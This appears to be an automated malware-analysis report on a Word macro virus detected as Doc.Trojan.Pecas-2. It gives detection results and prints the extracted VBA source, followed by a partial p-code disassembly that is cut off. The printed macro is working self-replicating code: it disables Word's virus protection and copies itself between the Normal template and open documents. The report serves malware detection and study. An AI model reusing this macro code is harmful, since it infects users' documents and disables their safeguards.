MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Pecas-2. It contains VBA macros that attempt to modify the Normal template and potentially spread to other documents. The macro also includes a hardcoded string 'pequitas te amo' which might be a lure or part of an obfuscation technique.
Heuristics 2
-
ClamAV: Doc.Trojan.Pecas-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Pecas-2
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5490 bytes |
SHA-256: b58d8a3b067139e082657adc259a776cb650fb999e2acddc0042fc569c1fcb2c |
|||
|
Detection
ClamAV:
Doc.Trojan.Pecas-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Pecas"
Attribute VB_Base = "1Normal.Pecas"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'by morris "vegueta"
'pequitas es mi novia
'mi viejo amigo " goto"
'dedicado para ti pequitas
'este virus tiene un bug en mi siguiente version lo solucionare
Private Sub Document_Close()
On Error Resume Next
Application.ScreenUpdating = False
Options.VirusProtection = (1 - 1)
Options.SaveNormalPrompt = (1 - 1)
Options.ConfirmConversions = (1 - 1)
Set plan = NormalTemplate.VBProject.VBComponents.Item(1)
Set activ = ActiveDocument.VBProject.VBComponents.Item(1)
Set temp = NormalTemplate.VBProject.VBComponents(1).CodeModule
bandera = 0
paso2:
cont = activ.CodeModule.countoflines
cont1 = plan.CodeModule.countoflines
var = plan.Name
If var = "Pecas" Then
If activ.Name <> "Pecas" Then
activ.CodeModule.DeleteLines 1, cont
activ.CodeModule.InsertLines 1, temp.lines(1, cont1)
activ.Name = plan.Name
If bandera = 0 Then
If InStr(1, ActiveDocument.Name, "Document") = 0 Then
If Day(Now) = 13 Then Selection.TypeText "pequitas te amo"
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
Else
ActiveDocument.Saved = True
End If
End If
End If
End If
bandera = bandera + 1
If bandera > 1 Then
Application.ScreenUpdating = False
Exit Sub
End If
Set activ = NormalTemplate.VBProject.VBComponents.Item(1)
Set plan = ActiveDocument.VBProject.VBComponents.Item(1)
Set temp = ActiveDocument.VBProject.VBComponents(1).CodeModule
GoTo paso2
End Sub
' Processing file: /opt/analyzer/scan_staging/deee8eb6b95b46209f0e5d85576b544f.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Pecas - 3216 bytes
' Line #0:
' Line #1:
' QuoteRem 0x0000 0x0013 "by morris "vegueta""
' Line #2:
' QuoteRem 0x0000 0x0014 "pequitas es mi novia"
' Line #3:
' QuoteRem 0x0000 0x0016 "mi viejo amigo " goto""
' Line #4:
' QuoteRem 0x0000 0x0019 "dedicado para ti pequitas"
' Line #5:
' QuoteRem 0x0000 0x003E "este virus tiene un bug en mi siguiente version lo solucionare"
' Line #6:
' FuncDefn (Private Sub Document_Close())
' Line #7:
' OnError (Resume Next)
' Line #8:
' LitVarSpecial (False)
' Ld Application
' MemSt ScreenUpdating
' Line #9:
' LitDI2 0x0001
' LitDI2 0x0001
' Sub
' Paren
' Ld Options
' MemSt VirusProtection
' Line #10:
' LitDI2 0x0001
' LitDI2 0x0001
' Sub
' Paren
' Ld Options
' MemSt SaveNormalPrompt
' Line #11:
' LitDI2 0x0001
' LitDI2 0x0001
' Sub
' Paren
' Ld Options
' MemSt ConfirmConversions
' Line #12:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set plan
' Line #13:
' SetStmt
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set activ
' Line #14:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set temp
' Line #15:
' LitDI2 0x0000
' St bandera
' Line #16:
' Label paso2
' Line #17:
' Ld activ
' MemLd CodeModule
' MemLd countoflines
' St cont
' Line #18:
' Ld plan
' MemLd CodeModule
' MemLd countoflines
' St cont1
' Line #19:
' Ld plan
' MemLd New
' St var
' Line #20:
' Ld var
' LitStr 0x0005 "Pecas"
' Eq
' IfBlock
' Line #21:
' Ld activ
' MemLd New
' LitStr 0x0005 "Pecas"
' Ne
' IfBlock
' Line #22:
' LitDI2 0x0001
' Ld cont
' Ld activ
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0002
' Line #23:
' LitDI2 0x0001
' LitDI2 0x0001
' Ld cont1
' Ld temp
' ArgsMemLd lines 0x0002
' Ld activ
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #24:
' Ld plan
' MemLd New
' Ld activ
' MemSt New
' Line #25:
' Ld bandera
' LitDI2 0x0000
' Eq
' IfBlock
' Line #26:
' LitDI2 0x0001
' Ld ActiveDocu
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.